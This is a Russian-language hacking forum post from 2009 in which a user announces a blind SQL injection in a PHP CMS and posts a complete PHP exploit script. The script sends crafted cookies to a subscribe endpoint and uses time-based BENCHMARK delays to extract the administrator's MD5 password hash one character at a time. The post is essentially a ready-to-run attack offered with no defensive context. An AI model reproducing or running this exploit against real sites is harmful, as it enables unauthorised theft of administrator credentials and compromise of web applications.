ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #3  
Старый 02.06.2009, 22:24
Soul Linker
Новичок
Регистрация: 05.09.2006
Сообщений: 15
Провел на форуме:
72328

Репутация: 5
По умолчанию

Вроде нашел блинд...
PHP код:
<?php

//by SoulLinker

set_time_limit(0);

function 
send_packet($host$port$packet)
{
    
$fp = @fsockopen($host$port$errno$errstr5);

    if (!
$fp)
    {
        
$fl fopen('packet_dan_error.log''ab');
        
fputs($fl$packet."\n");
        
fclose($fl);
        
        return 
false;
    } 

    
fwrite($fp$packet);
    echo 
'send ';
    
$out '';
    while (
$res fread($fp128))
    {
        
$out .= $res;
        echo 
'.';
    }
    
    
$len strlen($out);
    echo 
' ['.$len."]\n";

    if (
$len 1000)
    {
        
$fl fopen('packet_dan.log''ab');
        
fputs($fl$packet."\n".$out."\n\n");
        
fclose($fl);
    }
        
    
fclose($fp);
}

function 
packet($host$path$data)
{
    
$buf = array();
    
$buf[] = "GET $path HTTP/1.0";
    
$buf[] = "Host: $host";
    
$buf[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10";
    
$buf[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    
$buf[] = "Connection: close";
    
$buf[] = "Cookie: subformat=".urlencode($data);
    
$buf[] = '';
    
$buf[] = '';
    
    
$packet join("\r\n"$buf);
    
    return 
$packet;
}

$md5 '';
$hash_symbols = array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');

$host 'work5.local';
$prefix 'dn053_';

for (
$i 1$i <= 32$i++)
{
    
$found false;
    foreach (
$hash_symbols as $chr)
    {
//        $mail = 'a'.rand(10000, 99999).'@a'.rand(10000, 99999);
        
$mail 'a'.rand(1000099999).'@mail.ru';
        
$path '/index.php?dn=subscribe&to=check&submail='.$mail.'&subname=soullinker';
        
        
$timestart time();
        
$statement "(SeLeCT sUBstR(adpwd,$i,1) fRom ".$prefix."admin WherE admid=1)='$chr'";
        
$data "1', '878', IF(".$statement.", beNchMARK(5000000, md5(now())),'1'), '789') -- ";
        
$packet packet($host$path$data);
        
send_packet($host80$packet);
        
$timeend time();
        
$timediff $timeend $timestart;
        echo 
'Time: '.$timediff."\n";
        if (
$timediff >= 4)
        {
            
$found true;
            
$md5 .= $chr; echo 'MD5: ['.$md5.str_repeat('.'32 $i)."]\n";
            break;
        }
    }
    if (!
$found)
    {
        die(
' FAILED (wrong prefix?) ');
    }
}

echo 
"\n__DONE__";
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ